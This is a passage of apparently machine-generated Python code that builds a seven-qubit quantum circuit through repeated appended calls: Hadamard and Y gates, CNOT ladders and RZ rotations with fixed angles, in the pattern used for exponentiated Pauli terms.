sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(2.655704, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.Y(6))
sim.append(sim.H(3))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.Y(6))
sim.append(sim.Y(3))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(2.655704, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.Y(6))
sim.append(sim.Y(3))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.H(6))
sim.append(sim.H(3))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(2.655704, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.H(6))
sim.append(sim.H(3))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.Y(6))
sim.append(sim.H(3))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(2.655704, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.Y(6))
sim.append(sim.H(3))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.H(6))
sim.append(sim.Y(3))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(2.655704, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.H(6))
sim.append(sim.Y(3))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.H(6))
sim.append(sim.H(4))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(5.354909, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(4, 1))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.H(6))
sim.append(sim.H(4))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.Y(6))
sim.append(sim.Y(4))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(5.354909, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(4, 1))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.Y(6))
sim.append(sim.Y(4))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.H(6))
sim.append(sim.Y(4))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(5.354909, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(4, 1))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.H(6))
sim.append(sim.Y(4))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.Y(6))
sim.append(sim.H(4))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(5.354909, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(4, 1))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.Y(6))
sim.append(sim.H(4))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.Y(6))
sim.append(sim.Y(4))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(5.354909, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(4, 1))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.Y(6))
sim.append(sim.Y(4))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.H(6))
sim.append(sim.H(4))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(5.354909, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(4, 1))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.H(6))
sim.append(sim.H(4))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.Y(6))
sim.append(sim.H(4))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(5.354909, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(4, 1))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.Y(6))
sim.append(sim.H(4))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.H(6))
sim.append(sim.Y(4))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(5.354909, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(4, 1))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.H(6))
sim.append(sim.Y(4))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.H(6))
sim.append(sim.H(4))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(1.150055, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(4, 2))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.H(6))
sim.append(sim.H(4))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.Y(6))
sim.append(sim.Y(4))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(1.150055, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(4, 2))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.Y(6))
sim.append(sim.Y(4))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.H(6))
sim.append(sim.Y(4))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(1.150055, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(4, 2))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.H(6))
sim.append(sim.Y(4))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.Y(6))
sim.append(sim.H(4))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(1.150055, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(4, 2))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.Y(6))
sim.append(sim.H(4))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.Y(6))
sim.append(sim.Y(4))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(1.150055, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(4, 2))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.Y(6))
sim.append(sim.Y(4))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.H(6))
sim.append(sim.H(4))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(1.150055, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(4, 2))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.H(6))
sim.append(sim.H(4))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.Y(6))
sim.append(sim.H(4))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(1.150055, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(4, 2))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.Y(6))
sim.append(sim.H(4))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.H(6))
sim.append(sim.Y(4))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(1.150055, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(4, 2))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.H(6))
sim.append(sim.Y(4))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.H(6))
sim.append(sim.H(4))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(5.886901, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(4, 2))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.H(6))
sim.append(sim.H(4))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.Y(6))
sim.append(sim.Y(4))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(5.886901, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(4, 2))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.Y(6))
sim.append(sim.Y(4))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.H(6))
sim.append(sim.Y(4))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(5.886901, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(4, 2))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.H(6))
sim.append(sim.Y(4))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.Y(6))
sim.append(sim.H(4))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(5.886901, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(4, 2))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.Y(6))
sim.append(sim.H(4))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.Y(6))
sim.append(sim.Y(4))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(5.886901, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(4, 2))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.Y(6))
sim.append(sim.Y(4))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.H(6))
sim.append(sim.H(4))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(5.886901, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(4, 2))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.H(6))
sim.append(sim.H(4))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.Y(6))
sim.append(sim.H(4))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(5.886901, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(4, 2))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.Y(6))
sim.append(sim.H(4))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.H(6))
sim.append(sim.Y(4))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(5.886901, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(4, 2))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.H(6))
sim.append(sim.Y(4))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.H(6))
sim.append(sim.H(4))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(0.1612143, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.H(6))
sim.append(sim.H(4))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.Y(6))
sim.append(sim.Y(4))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(0.1612143, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.Y(6))
sim.append(sim.Y(4))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.H(6))
sim.append(sim.Y(4))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(0.1612143, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.H(6))
sim.append(sim.Y(4))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.Y(6))
sim.append(sim.H(4))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(0.1612143, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.Y(6))
sim.append(sim.H(4))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.Y(6))
sim.append(sim.Y(4))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(0.1612143, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.Y(6))
sim.append(sim.Y(4))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.H(6))
sim.append(sim.H(4))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(0.1612143, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.H(6))
sim.append(sim.H(4))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.Y(6))
sim.append(sim.H(4))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(0.1612143, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.Y(6))
sim.append(sim.H(4))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.H(6))
sim.append(sim.Y(4))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(0.1612143, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.H(6))
sim.append(sim.Y(4))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.H(6))
sim.append(sim.H(4))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(1.36769, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.H(6))
sim.append(sim.H(4))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.Y(6))
sim.append(sim.Y(4))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(1.36769, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.Y(6))
sim.append(sim.Y(4))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.H(6))
sim.append(sim.Y(4))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(1.36769, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.H(6))
sim.append(sim.Y(4))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.Y(6))
sim.append(sim.H(4))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(1.36769, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.Y(6))
sim.append(sim.H(4))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.Y(6))
sim.append(sim.Y(4))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(1.36769, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.Y(6))
sim.append(sim.Y(4))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.H(6))
sim.append(sim.H(4))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(1.36769, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.H(6))
sim.append(sim.H(4))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.Y(6))
sim.append(sim.H(4))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(1.36769, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.Y(6))
sim.append(sim.H(4))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.H(6))
sim.append(sim.Y(4))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(1.36769, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.H(6))
sim.append(sim.Y(4))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.H(6))
sim.append(sim.H(4))
sim.append(sim.H(2))
sim.append(sim.H(2))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(4.481711, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.H(6))
sim.append(sim.H(4))
sim.append(sim.H(2))
sim.append(sim.H(2))
sim.append(sim.Y(6))
sim.append(sim.Y(4))
sim.append(sim.Y(2))
sim.append(sim.Y(2))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(4.481711, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.Y(6))
sim.append(sim.Y(4))
sim.append(sim.Y(2))
sim.append(sim.Y(2))
sim.append(sim.H(6))
sim.append(sim.Y(4))
sim.append(sim.H(2))
sim.append(sim.Y(2))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(4.481711, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.H(6))
sim.append(sim.Y(4))
sim.append(sim.H(2))
sim.append(sim.Y(2))
sim.append(sim.Y(6))
sim.append(sim.H(4))
sim.append(sim.Y(2))
sim.append(sim.H(2))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(4.481711, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.Y(6))
sim.append(sim.H(4))
sim.append(sim.Y(2))
sim.append(sim.H(2))
sim.append(sim.Y(6))
sim.append(sim.Y(4))
sim.append(sim.H(2))
sim.append(sim.H(2))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(4.481711, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.Y(6))
sim.append(sim.Y(4))
sim.append(sim.H(2))
sim.append(sim.H(2))
sim.append(sim.H(6))
sim.append(sim.H(4))
sim.append(sim.Y(2))
sim.append(sim.Y(2))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(4.481711, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.H(6))
sim.append(sim.H(4))
sim.append(sim.Y(2))
sim.append(sim.Y(2))
sim.append(sim.Y(6))
sim.append(sim.H(4))
sim.append(sim.H(2))
sim.append(sim.Y(2))
sim.append(sim.CX(6, 5))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.RZ(4.481711, 2))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(5, 4))
sim.append(sim.CX(6, 5))
sim.append(sim.Y(6))
sim.append(sim.H(4))
